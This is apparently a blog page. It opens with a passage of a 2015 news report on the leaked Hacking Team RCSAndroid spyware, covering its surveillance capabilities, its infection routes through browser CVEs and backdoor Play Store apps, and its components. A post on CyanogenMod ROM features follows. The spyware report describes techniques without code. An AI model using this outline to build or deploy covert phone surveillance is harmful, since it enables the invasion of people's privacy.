-Capture screenshots using the 'screencap' command and framebuffer direct reading
-Collect passwords for Wi-Fi networks and online accounts, including WhatsApp, Facebook, Twitter, -Google, Skype, and LinkedIn
-Collect SMS, MMS, and Gmail messages
-Capture real-time voice calls in any network or application by hooking into the 'mediaserver' system service
-Capture photos using the front and back cameras
-Monitor clipboard content
-Record using the microphone
-Record location
-Gather device information
-Collect contacts and decode messages from IM accounts, including WhatsApp, Telegram, Facebook -Messenger, Skype, WeChat, Viber, Line, Hangouts, and BlackBerry Messenger.

RCSAndroid uses two different methods to infect targeted Android devices.

1. Hacking Team used text and email messages containing specially crafted URLs that triggered exploits for several vulnerabilities (CVE-2012-2825 and CVE-2012-2871) present in the default browsers of Android 4.0 Ice Cream to 4.3 Jelly Bean, allowing the attacker to gain root privileges, and install the RCSAndroid APK.

2. The company used backdoor apps such as "BeNews" available on the official Google Play Store to take advantage of a local privilege escalation bug to root the device and install the RCSAndroid agent.

RCSAndroid has 4 'critical components':

-Penetration solutions – Methods to get into the device, either via SMS or email or a legitimate app
-Low-level native code – Advanced exploits and spy tools beyond Android's security framework 
-High-level Java agent – The application's malicious APK
-Command-and-control (C&C) servers – Servers used to remotely send or receive malicious commands

Given that the source code of RCSAndroid is now available to everybody, it will likely put Android users in danger. So, if you own a smartphone running any Android version from 4.0 Ice Cream to 4.3 Jelly Bean, you need to 'Get Rid of it Today.' "The leaked RCSAndroid code is a commercial weapon now in the wild," security researchers wrote in a blog post. "Mobile users are called on to be on top of this news and be on guard for signs of monitoring.  Users of Android 5.0 Lollipop may also be in danger of being targeted, as some emails sent among Hacking Team executives indicates that "Hacking Team was in the process of developing exploits for Android 5.0 Lollipop," but so far there is no such indication.

Sunday, July 26, 2015

CyanogenMod OS - The Brief and Features

CyanogenMod is an alternate operating system over your pre-installed Android OS that gives you an enhanced performance and increases the possibilities of your Android device. It is an improved open source firmware for Android based smartphone and tablets, which offers features that are not found on the official firmware distributed by the manufacturers.

CyanogenMod custom ROM is a successful development to remove the restrictions that bound the Android users to the minimum options provided on their smartphones. However, being an open source platform, Android does not restrict itself any way, therefore following the rooting process Android enthusiasts have found some amazing tricks to unveil the maximum possibilities of the Android OS.

CyanogenMod supports plenty of features that are worth considering. It includes many additional customization and interface options. For instance, it features native theming, customized soft buttons and tablets tweaks, enhance notifications and reboot menu. It also features performance boost on your devices, which can extend the limits of your device CPU speed with CPU overclocking. Also it supports open VPN client and enhanced tethering on WiFi, Bluetooth and USB.

It seems Lollipop is on every enthusiast’s mind these days, as OEMs have started a steady stream of OTAs. With this multipart update, Android 5.1, and what’s new and improved in CyanogenMod.

Android 5.1

Let’s start with the latest and greatest Lollipop release, Android 5.1. Released in the second week of March, 5.1 has actually seen two releases – 5.1_r1 earlier in the month and 5.1_r3 just this week. The team has been plugging away at these releases, rebasing and merging like fiends. We’re not quite at the point where nightlies will cross over to being officially branded CM12.1, but as always, you are welcome to track our progress.

The CyanogenMod 12.1 (Android 5.1) source is available to sync, and up and running with few issues on various devices – including the latest developer device the Nexus 6. When you repo init the source, just point the branch to ‘staging/cm-12.1’. The staging branch is where we are making things ‘just work’ (you’ll see many patches simply labelled “Fix build”). These patches will be cleaned up prior to moving the source code over to our active mainline branches.

Oldies Materialized

One of the first items you’ll notice is the Material theme, meant to invoke a sense of ‘living document’ while you interact with your device and apps. All the sweeping animations, bold and heavy on graphic design are present, and we’ve spent some time working on revisiting core CM apps to reflect the new design guidelines.

The CM Messaging app is now sporting a floating action button (FAB) and circular avatars for your contacts, embracing the most common indicators of Material. The app is now Android Wear compliant, thanks to contributor Anthony Williams (dexlab) – allowing it to gel nicely with the latest hot Android accessory. Browser, abandoned for the most part in AOSP, got a facelift as well, sporting a new icon and making use of Lollipop’s vector support.

CyanogenMod File Manager

This venerable app has been a CM staple for quite a few years now. While it too has seen the Material UI overhaul and even learned a new trick or two with zip/rar and secure storage support, its user experience (UX) isn’t the most ideal or easy to navigate. To that end, this is the next app on their list and user's inputs are welcome.

Features of CyanogenMod

There are many reasons that you may like to switch from the original Android to CyanogenMod custom ROM. The CyanogenMod community adds up many features in the stock Android like its security, lightness, no bloatware and extreme customization. Apart from this there are some key features offered by CyanogenMod which we are listing here in brief.

Up to date

CyanogenMod provides up to date versions that are bug free and improved with latest android updates. You can update you CyanogenMod with latest version when it releases or by your own schedule.

Privacy and app permissions

CyanogenMod provides you more control on your privacy and application permissions.

Blacklist

CyanogenMod offers the Blacklist features which enable users to block unwanted and annoying calls and messages by either complete blocking or just ignoring the alerts for a while.

Quick Setting Ribbon

You can have more easy access to your apps and features with CyanogenMod. It allows to embed quick toggles in your notification drawer for any of you useful apps. You can also customize the layout of your quick settings.

CyanogenMod Theme engine

Amazing themes are perhaps one of the most impressive thing offered by CyanogenMod. Using its integrated theme engine the entire look and feel of your OS can be changed. There are endless possibilities of styling on CyanogenMod. You can read more about the best CyanogenMod themes and free CyangogenMod themes in more details.

Status bar Behavior

Like the quick setting you can also customize the status bar and add new behaviors. For instance, you can set an alarm by just taping the time and access your calendar by taping the date.

Display and Lights

Unlike the normal Android ROMs where you have limited access to many features here you can control anything. For instance, you can Control brightness, wallpapers, rotation, notification lights and remote displays according to you choice.

Lockscreen

The Lockscreen can be more customized to increase you productivity. CyanogenMod enables you to access your apps directly from Lockscreen and also many useful information are displayed at first look.